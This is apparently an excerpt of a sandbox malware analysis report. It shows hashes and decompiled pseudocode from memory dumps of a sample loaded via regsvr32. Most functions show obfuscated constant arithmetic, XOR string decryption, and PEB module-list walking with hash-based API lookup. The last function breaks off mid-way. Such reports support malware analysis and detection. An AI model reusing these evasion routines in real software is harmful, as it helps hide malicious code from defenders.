                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d75d1772c7219b20785abb7a195f1a2e2e441af678795809dd8cd4dcf7f945f3
                                                                                                                • Instruction ID: ae438224247e911b38e07eb4e1946647d651d50449f62aad67f5fe247d07991d
                                                                                                                • Opcode Fuzzy Hash: d75d1772c7219b20785abb7a195f1a2e2e441af678795809dd8cd4dcf7f945f3
                                                                                                                • Instruction Fuzzy Hash: EA419C72A093528FD314CF28C88545BFBE1FFA8318F054A2CF999A7211D774DA49CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E001BF5D9(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                				void* _t54;
                                                                                                                				signed int _t58;
                                                                                                                				short* _t77;
                                                                                                                				signed int _t78;
                                                                                                                				signed int _t80;
                                                                                                                				signed int _t85;
                                                                                                                				unsigned int _t86;
                                                                                                                				unsigned int _t87;
                                                                                                                				short* _t90;
                                                                                                                				signed int* _t92;
                                                                                                                				signed int* _t93;
                                                                                                                				signed int* _t94;
                                                                                                                				unsigned int _t96;
                                                                                                                				void* _t102;
                                                                                                                				short _t104;
                                                                                                                				void* _t106;
                                                                                                                				void* _t108;
                                                                                                                
                                                                                                                				_t94 =  *(_t106 + 0x34);
                                                                                                                				_push( *((intOrPtr*)(_t106 + 0x3c)));
                                                                                                                				_push(_t94);
                                                                                                                				_push( *((intOrPtr*)(_t106 + 0x3c)));
                                                                                                                				E001AC98A(_t54);
                                                                                                                				 *(_t106 + 0x34) = 0x17b002;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				 *(_t106 + 0x4c) = 0xe3c440;
                                                                                                                				_t92 =  &(_t94[1]);
                                                                                                                				 *(_t106 + 0x4c) =  *(_t106 + 0x4c) + 0xaedf;
                                                                                                                				 *(_t106 + 0x4c) =  *(_t106 + 0x4c) ^ 0xcc7c4f8e;
                                                                                                                				 *(_t106 + 0x4c) =  *(_t106 + 0x4c) | 0x31260880;
                                                                                                                				 *(_t106 + 0x4c) =  *(_t106 + 0x4c) ^ 0xfdb7815e;
                                                                                                                				 *(_t106 + 0x28) = 0xce8556;
                                                                                                                				 *(_t106 + 0x28) =  *(_t106 + 0x28) + 0xffff7840;
                                                                                                                				 *(_t106 + 0x28) =  *(_t106 + 0x28) ^ 0x00c50c05;
                                                                                                                				 *(_t106 + 0x20) = 0x81309a;
                                                                                                                				 *(_t106 + 0x20) =  *(_t106 + 0x20) >> 6;
                                                                                                                				 *(_t106 + 0x20) =  *(_t106 + 0x20) + 0x8f83;
                                                                                                                				 *(_t106 + 0x20) =  *(_t106 + 0x20) ^ 0x00061142;
                                                                                                                				 *(_t106 + 0x24) = 0xa40542;
                                                                                                                				 *(_t106 + 0x24) =  *(_t106 + 0x24) + 0xffffd7fc;
                                                                                                                				 *(_t106 + 0x24) =  *(_t106 + 0x24) ^ 0x00afd2be;
                                                                                                                				_t80 =  *_t94;
                                                                                                                				_t93 =  &(_t92[1]);
                                                                                                                				_t58 =  *_t92 ^ _t80;
                                                                                                                				 *(_t106 + 0x2c) = _t80;
                                                                                                                				 *(_t106 + 0x30) = _t58;
                                                                                                                				_t35 = _t58 + 1; // 0x1
                                                                                                                				_t95 = _t35;
                                                                                                                				_t96 =  !=  ? (_t35 & 0xfffffffc) + 4 : _t35;
                                                                                                                				_t77 = E001A303A(_t95 & 0x00000003, _t96 + _t96);
                                                                                                                				_t108 = _t106 + 0x1c;
                                                                                                                				 *((intOrPtr*)(_t108 + 0x38)) = _t77;
                                                                                                                				if(_t77 != 0) {
                                                                                                                					_t104 = 0;
                                                                                                                					_t90 = _t77;
                                                                                                                					_t102 =  >  ? 0 :  &(_t93[_t96 >> 2]) - _t93 + 3 >> 2;
                                                                                                                					if(_t102 != 0) {
                                                                                                                						_t78 =  *(_t108 + 0x1c);
                                                                                                                						do {
                                                                                                                							_t85 =  *_t93;
                                                                                                                							_t93 =  &(_t93[1]);
                                                                                                                							_t86 = _t85 ^ _t78;
                                                                                                                							 *_t90 = _t86 & 0x000000ff;
                                                                                                                							_t90 = _t90 + 8;
                                                                                                                							 *((short*)(_t90 - 6)) = _t86 >> 0x00000008 & 0x000000ff;
                                                                                                                							_t87 = _t86 >> 0x10;
                                                                                                                							_t104 = _t104 + 1;
                                                                                                                							 *((short*)(_t90 - 4)) = _t87 & 0x000000ff;
                                                                                                                							 *((short*)(_t90 - 2)) = _t87 >> 0x00000008 & 0x000000ff;
                                                                                                                						} while (_t104 < _t102);
                                                                                                                						_t77 =  *((intOrPtr*)(_t108 + 0x3c));
                                                                                                                					}
                                                                                                                					 *((short*)(_t77 +  *(_t108 + 0x20) * 2)) = 0;
                                                                                                                				}
                                                                                                                				return _t77;
                                                                                                                			}





















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 69a078ab523a5daffc0b0976a2c64f30202ec81ba3f21039fdb029f83dbc7004
                                                                                                                • Instruction ID: 2304d35e1c30723d13ddb64ee2908a6b2ac06e2845d8ad19384c9a107df948ee
                                                                                                                • Opcode Fuzzy Hash: 69a078ab523a5daffc0b0976a2c64f30202ec81ba3f21039fdb029f83dbc7004
                                                                                                                • Instruction Fuzzy Hash: 09418C726183119FC354CF29C88546BFBE0FF88318F414A2DF99AA7210D775E949CB96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E001B8EF8(void* __ecx, signed int* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				unsigned int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				void* _t63;
                                                                                                                				signed int _t71;
                                                                                                                				signed int _t79;
                                                                                                                				unsigned int _t83;
                                                                                                                				signed int _t86;
                                                                                                                				signed int _t88;
                                                                                                                				signed int _t89;
                                                                                                                				void* _t95;
                                                                                                                				signed int _t102;
                                                                                                                				void* _t107;
                                                                                                                				intOrPtr _t108;
                                                                                                                				signed int* _t109;
                                                                                                                				signed int* _t110;
                                                                                                                				signed int* _t111;
                                                                                                                
                                                                                                                				_t109 = _a12;
                                                                                                                				_t111 = __edx;
                                                                                                                				_push(_t109);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(_t63);
                                                                                                                				_v8 = 0x81841c;
                                                                                                                				_t108 = 0;
                                                                                                                				_v4 = 0;
                                                                                                                				_v24 = 0x9ca427;
                                                                                                                				_t88 = 0x3c;
                                                                                                                				_v24 = _v24 * 0x2e;
                                                                                                                				_v24 = _v24 / _t88;
                                                                                                                				_v24 = _v24 + 0x71d1;
                                                                                                                				_v24 = _v24 ^ 0x00786fa3;
                                                                                                                				_v20 = 0x266e1c;
                                                                                                                				_v20 = _v20 + 0xffff7682;
                                                                                                                				_v20 = _v20 >> 9;
                                                                                                                				_v20 = _v20 ^ 0x000d4282;
                                                                                                                				_v28 = 0x1696aa;
                                                                                                                				_t89 = 0x6e;
                                                                                                                				_v28 = _v28 / _t89;
                                                                                                                				_v28 = _v28 + 0x84af;
                                                                                                                				_v28 = _v28 * 0x77;
                                                                                                                				_v28 = _v28 ^ 0x00592002;
                                                                                                                				_a12 = 0xf328db;
                                                                                                                				_a12 = _a12 << 9;
                                                                                                                				_a12 = _a12 + 0x68cd;
                                                                                                                				_a12 = _a12 << 2;
                                                                                                                				_a12 = _a12 ^ 0x99412f8f;
                                                                                                                				_t71 =  *_t109;
                                                                                                                				_t110 =  &(_t109[2]);
                                                                                                                				_t102 = _t109[1] ^ _t71;
                                                                                                                				_v16 = _t71;
                                                                                                                				_v12 = _t102;
                                                                                                                				_t83 =  !=  ? (_t102 & 0xfffffffc) + 4 : _t102;
                                                                                                                				_t79 = E001A303A(_t102 & 0x00000003, _t83);
                                                                                                                				_a12 = _t79;
                                                                                                                				if(_t79 != 0) {
                                                                                                                					_t107 =  >  ? 0 :  &(_t110[_t83 >> 2]) - _t110 + 3 >> 2;
                                                                                                                					if(_t107 != 0) {
                                                                                                                						_t86 = _v16;
                                                                                                                						_t95 = _t79 - _t110;
                                                                                                                						do {
                                                                                                                							_t108 = _t108 + 1;
                                                                                                                							 *(_t95 + _t110) =  *_t110 ^ _t86;
                                                                                                                							_t110 =  &(_t110[1]);
                                                                                                                						} while (_t108 < _t107);
                                                                                                                						_t79 = _a12;
                                                                                                                					}
                                                                                                                					if(_t111 != 0) {
                                                                                                                						 *_t111 = _v12;
                                                                                                                						return _t79;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t79;
                                                                                                                			}

























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e57496d2c4da7939a623119ac7073f5259244425f4165802adbd11dc9958119
                                                                                                                • Instruction ID: feb4afdbfc4da0287113452d0c119cd426c13649dd17605bd2158cc75448bb8a
                                                                                                                • Opcode Fuzzy Hash: 4e57496d2c4da7939a623119ac7073f5259244425f4165802adbd11dc9958119
                                                                                                                • Instruction Fuzzy Hash: CF4145726183009FC358DF2AC88594BFBE6EFD8318F408A2DF99993250D7B6D9058F46
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001B9054(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				void* _t95;
                                                                                                                				signed int _t109;
                                                                                                                				void* _t115;
                                                                                                                				signed int _t116;
                                                                                                                
                                                                                                                				_push(_a12);
                                                                                                                				_t115 = __edx;
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(_t95);
                                                                                                                				_v44 = _v44 & 0x00000000;
                                                                                                                				_v48 = 0x9e1a5;
                                                                                                                				_v8 = 0xdc3688;
                                                                                                                				_v8 = _v8 + 0x7ce0;
                                                                                                                				_v8 = _v8 | 0xcd57f9a8;
                                                                                                                				_v8 = _v8 >> 4;
                                                                                                                				_v8 = _v8 ^ 0x0cd576a9;
                                                                                                                				_v16 = 0x212d10;
                                                                                                                				_v16 = _v16 + 0xffffc278;
                                                                                                                				_v16 = _v16 + 0xffff272d;
                                                                                                                				_v16 = _v16 | 0xc3a15b96;
                                                                                                                				_v16 = _v16 ^ 0xc3acf350;
                                                                                                                				_v24 = 0x990712;
                                                                                                                				_v24 = _v24 << 0x10;
                                                                                                                				_v24 = _v24 << 0xe;
                                                                                                                				_v24 = _v24 ^ 0x80098d6a;
                                                                                                                				_v12 = 0x3a9ba8;
                                                                                                                				_v12 = _v12 | 0xafa1a83f;
                                                                                                                				_v12 = _v12 << 0x10;
                                                                                                                				_v12 = _v12 ^ 0xd54525de;
                                                                                                                				_v12 = _v12 ^ 0x6efb41b1;
                                                                                                                				_v20 = 0x46b34b;
                                                                                                                				_v20 = _v20 >> 4;
                                                                                                                				_v20 = _v20 << 0xb;
                                                                                                                				_v20 = _v20 << 0xa;
                                                                                                                				_v20 = _v20 ^ 0x66867237;
                                                                                                                				_v40 = 0x95e0b6;
                                                                                                                				_v40 = _v40 ^ 0x4178c11d;
                                                                                                                				_v40 = _v40 ^ 0x41eefde3;
                                                                                                                				_v32 = 0x7e0534;
                                                                                                                				_t109 = 0x3e;
                                                                                                                				_v32 = _v32 / _t109;
                                                                                                                				_v32 = _v32 * 0x48;
                                                                                                                				_v32 = _v32 ^ 0x0095c58a;
                                                                                                                				_v36 = 0xfe3c4e;
                                                                                                                				_v36 = _v36 | 0xebbc6491;
                                                                                                                				_v36 = _v36 ^ 0xebf9a972;
                                                                                                                				E001ACCA2();
                                                                                                                				_v28 = 0x95bdda;
                                                                                                                				_v28 = _v28 >> 0xc;
                                                                                                                				_v28 = _v28 + 0xffffd3ae;
                                                                                                                				_v28 = _v28 ^ 0xffffdd0d;
                                                                                                                				_v8 = 0x118eac;
                                                                                                                				_v8 = _v8 | 0xfe8faf7f;
                                                                                                                				_v8 = _v8 ^ 0xfe9fafef;
                                                                                                                				_push(_v8);
                                                                                                                				_t116 = E001B96D4(_t109, _v28);
                                                                                                                				E001A8744(_v20, _v40, 1, _v32, _t116, _t115, _v36);
                                                                                                                				 *((short*)(_t115 + _t116 * 2)) = 0;
                                                                                                                				return 0;
                                                                                                                			}



















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bfd6b85d14858a20a4312930a7159a801d78a2fb2e3c1ccbf8bb7f41841aedae
                                                                                                                • Instruction ID: 387a4bbca418883065080b22e95fa0aeba59fd0b1bfd7230b725173a858abef6
                                                                                                                • Opcode Fuzzy Hash: bfd6b85d14858a20a4312930a7159a801d78a2fb2e3c1ccbf8bb7f41841aedae
                                                                                                                • Instruction Fuzzy Hash: 0141F0B5C01209EBCF19DFE5C94A9EEBBB0FB48304F208158D421B6250D3B54B55DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001B17D2(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				intOrPtr _v44;
                                                                                                                				void* _t83;
                                                                                                                				signed int _t96;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t83);
                                                                                                                				_v32 = _v32 & 0x00000000;
                                                                                                                				_v44 = 0xe415c0;
                                                                                                                				_v40 = 0xe426f4;
                                                                                                                				_v36 = 0x5840d9;
                                                                                                                				_v8 = 0xa0d481;
                                                                                                                				_v8 = _v8 ^ 0x6de56bc4;
                                                                                                                				_v8 = _v8 + 0xffff6d85;
                                                                                                                				_t96 = 6;
                                                                                                                				_v8 = _v8 * 0x3e;
                                                                                                                				_v8 = _v8 ^ 0x76c3ea7e;
                                                                                                                				_v16 = 0x87ce6f;
                                                                                                                				_v16 = _v16 * 0x69;
                                                                                                                				_v16 = _v16 * 0x7f;
                                                                                                                				_v16 = _v16 ^ 0xa22a0e34;
                                                                                                                				_v24 = 0x726ed0;
                                                                                                                				_v24 = _v24 * 6;
                                                                                                                				_v24 = _v24 | 0xdcb2b5b4;
                                                                                                                				_v24 = _v24 ^ 0xdebc2230;
                                                                                                                				_v12 = 0x37853f;
                                                                                                                				_v12 = _v12 + 0x95c8;
                                                                                                                				_v12 = _v12 >> 0x10;
                                                                                                                				_v12 = _v12 / _t96;
                                                                                                                				_v12 = _v12 ^ 0x000f372d;
                                                                                                                				_v24 = 0xe3a3ed;
                                                                                                                				_v24 = _v24 << 3;
                                                                                                                				_v24 = _v24 << 4;
                                                                                                                				_v24 = _v24 ^ 0x71dc4959;
                                                                                                                				_v24 = 0xe60ad8;
                                                                                                                				_v24 = _v24 << 5;
                                                                                                                				_v24 = _v24 + 0xffff3ffd;
                                                                                                                				_v24 = _v24 ^ 0x1cca9877;
                                                                                                                				_v28 = 0xaba7da;
                                                                                                                				_v28 = _v28 + 0xffffaec9;
                                                                                                                				_v28 = _v28 ^ 0x00a22bfe;
                                                                                                                				_v20 = 0xe9db9a;
                                                                                                                				_v20 = _v20 >> 4;
                                                                                                                				_v20 = _v20 | 0xa64ddeb7;
                                                                                                                				_v20 = _v20 ^ 0xa64149f2;
                                                                                                                				_v12 = 0x8eb6a4;
                                                                                                                				_v12 = _v12 >> 4;
                                                                                                                				_v12 = _v12 | 0xaec5c8d0;
                                                                                                                				_v12 = _v12 ^ 0xaec0c394;
                                                                                                                				return E001A6F64(_v24, _v28, _v20, _a4, _v12, E001B345B());
                                                                                                                			}
















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001A806B(void* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				signed int _t63;
                                                                                                                				void* _t67;
                                                                                                                				signed int _t69;
                                                                                                                				intOrPtr* _t75;
                                                                                                                				intOrPtr* _t76;
                                                                                                                				void* _t77;
                                                                                                                
                                                                                                                				_v32 = _v32 & 0x00000000;
                                                                                                                				_v36 = 0x6fa8db;
                                                                                                                				_v24 = 0xbff84a;
                                                                                                                				_v24 = _v24 * 0x49;
                                                                                                                				_t67 = __ecx;
                                                                                                                				_v24 = _v24 ^ 0x36be5512;
                                                                                                                				_v20 = 0xf2c735;
                                                                                                                				_v20 = _v20 ^ 0x12edd835;
                                                                                                                				_v20 = _v20 ^ 0x12178531;
                                                                                                                				_v16 = 0xf65224;
                                                                                                                				_v16 = _v16 ^ 0x11a19d06;
                                                                                                                				_t69 = 0x13;
                                                                                                                				_v16 = _v16 / _t69;
                                                                                                                				_v16 = _v16 ^ 0x00ef7203;
                                                                                                                				_v12 = 0x87fe1e;
                                                                                                                				_v12 = _v12 << 0xa;
                                                                                                                				_v12 = _v12 ^ 0x4514e006;
                                                                                                                				_v12 = _v12 ^ 0xadfd13c8;
                                                                                                                				_v12 = _v12 ^ 0xf711b3ae;
                                                                                                                				_v28 = 0xa8ba97;
                                                                                                                				_v28 = _v28 + 0xfffff9d1;
                                                                                                                				_v28 = _v28 ^ 0x00ae1823;
                                                                                                                				_v8 = 0xaa5f3a;
                                                                                                                				_v8 = _v8 << 2;
                                                                                                                				_v8 = _v8 ^ 0x3838b80e;
                                                                                                                				_v8 = _v8 + 0xff56;
                                                                                                                				_v8 = _v8 ^ 0x3a9fe257;
                                                                                                                				_t75 =  *((intOrPtr*)(E001A32AC() + 0xc)) + 0xc;
                                                                                                                				_t76 =  *_t75;
                                                                                                                				while(_t76 != _t75) {
                                                                                                                					_t63 = E001AB9F6(_v16, _v12, _v28,  *((intOrPtr*)(_t76 + 0x30)), _v8);
                                                                                                                					_t77 = _t77 + 0xc;
                                                                                                                					if((_t63 ^ 0x3241f2f8) == _t67) {
                                                                                                                						return  *((intOrPtr*)(_t76 + 0x18));
                                                                                                                					}
                                                                                                                					_t76 =  *_t76;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}


















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001A32AC() {
                                                                                                                
                                                                                                                				return  *[fs:0x30];
                                                                                                                			}




                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E10025A62(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t73;
                                                                                                                				struct HINSTANCE__* _t78;
                                                                                                                				_Unknown_base(*)()* _t79;
                                                                                                                				struct HINSTANCE__* _t81;
                                                                                                                				signed int _t92;
                                                                                                                				signed int _t94;
                                                                                                                				unsigned int _t97;
                                                                                                                				void* _t113;
                                                                                                                				unsigned int _t115;
                                                                                                                				signed short _t123;
                                                                                                                				unsigned int _t124;
                                                                                                                				_Unknown_base(*)()* _t131;
                                                                                                                				signed short _t133;
                                                                                                                				unsigned int _t134;
                                                                                                                				intOrPtr _t143;
                                                                                                                				void* _t144;
                                                                                                                				int _t145;
                                                                                                                				int _t146;
                                                                                                                				signed int _t164;
                                                                                                                				void* _t167;
                                                                                                                				signed int _t169;
                                                                                                                				void* _t170;
                                                                                                                				int _t172;
                                                                                                                				signed int _t176;
                                                                                                                				void* _t177;
                                                                                                                				CHAR* _t181;
                                                                                                                				void* _t183;
                                                                                                                				void* _t184;
                                                                                                                
                                                                                                                				_t167 = __edx;
                                                                                                                				_t184 = _t183 - 0x118;
                                                                                                                				_t181 = _t184 - 4;
                                                                                                                				_t73 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_t181[0x118] = _t73 ^ _t181;
                                                                                                                				_push(0x58);
                                                                                                                				E1003D1E6(E10053A71, __ebx, __edi, __esi);
                                                                                                                				_t169 = 0;
                                                                                                                				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                                				 *(_t181 - 0x14) = 0;
                                                                                                                				 *(_t181 - 0x10) = 0;
                                                                                                                				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                                				 *(_t181 - 0x18) = _t78;
                                                                                                                				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                                				if(_t79 == 0) {
                                                                                                                					if(GetVersion() >= 0) {
                                                                                                                						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                                						if(_t81 != 0) {
                                                                                                                							 *(_t181 - 0x14) = 0;
                                                                                                                							EnumResourceLanguagesA(_t81, 0x10, 1, E10025295, _t181 - 0x14);
                                                                                                                							if( *(_t181 - 0x14) != 0) {
                                                                                                                								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                                								_t145 = _t97 & 0x3ff;
                                                                                                                								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                                								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                                								 *(_t181 - 0x10) = 2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						 *(_t181 - 0x18) = 0;
                                                                                                                						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                                							 *(_t181 - 0x44) = 0x10;
                                                                                                                							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                                								_t113 = E10040EE1( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                                								_t184 = _t184 + 0xc;
                                                                                                                								if(_t113 == 1) {
                                                                                                                									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                									_t146 = _t115 & 0x3ff;
                                                                                                                									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                                									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                                									 *(_t181 - 0x10) = 2;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							RegCloseKey( *(_t181 - 0x18));
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t123 =  *_t79() & 0x0000ffff;
                                                                                                                					 *(_t181 - 0x14) = _t123;
                                                                                                                					_t124 = _t123 & 0x0000ffff;
                                                                                                                					_t164 = _t124 & 0x3ff;
                                                                                                                					 *(_t181 - 0x1c) = _t164;
                                                                                                                					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                                					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                                					 *(_t181 - 0x10) = 2;
                                                                                                                					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                                					if(_t131 != 0) {
                                                                                                                						_t133 =  *_t131() & 0x0000ffff;
                                                                                                                						 *(_t181 - 0x14) = _t133;
                                                                                                                						_t134 = _t133 & 0x0000ffff;
                                                                                                                						_t172 = _t134 & 0x3ff;
                                                                                                                						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                                						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                                						 *(_t181 - 0x10) = 4;
                                                                                                                					}
                                                                                                                					_t169 = 0;
                                                                                                                				}
                                                                                                                				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                                				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                                				_t181[0x105] = 0;
                                                                                                                				_t181[0x104] = 0;
                                                                                                                				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                                					_t143 = 0x20;
                                                                                                                					E1003BB70(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                                					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                                					 *(_t181 - 0x5c) = _t181;
                                                                                                                					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                                					 *(_t181 - 0x48) = 0x10000000;
                                                                                                                					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                                					E100252AB(_t181 - 0x3c, 0x10000000, 0xffffffff);
                                                                                                                					 *(_t181 - 4) = _t169;
                                                                                                                					if(E1002535B(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                                						E10025391(_t181 - 0x3c);
                                                                                                                					}
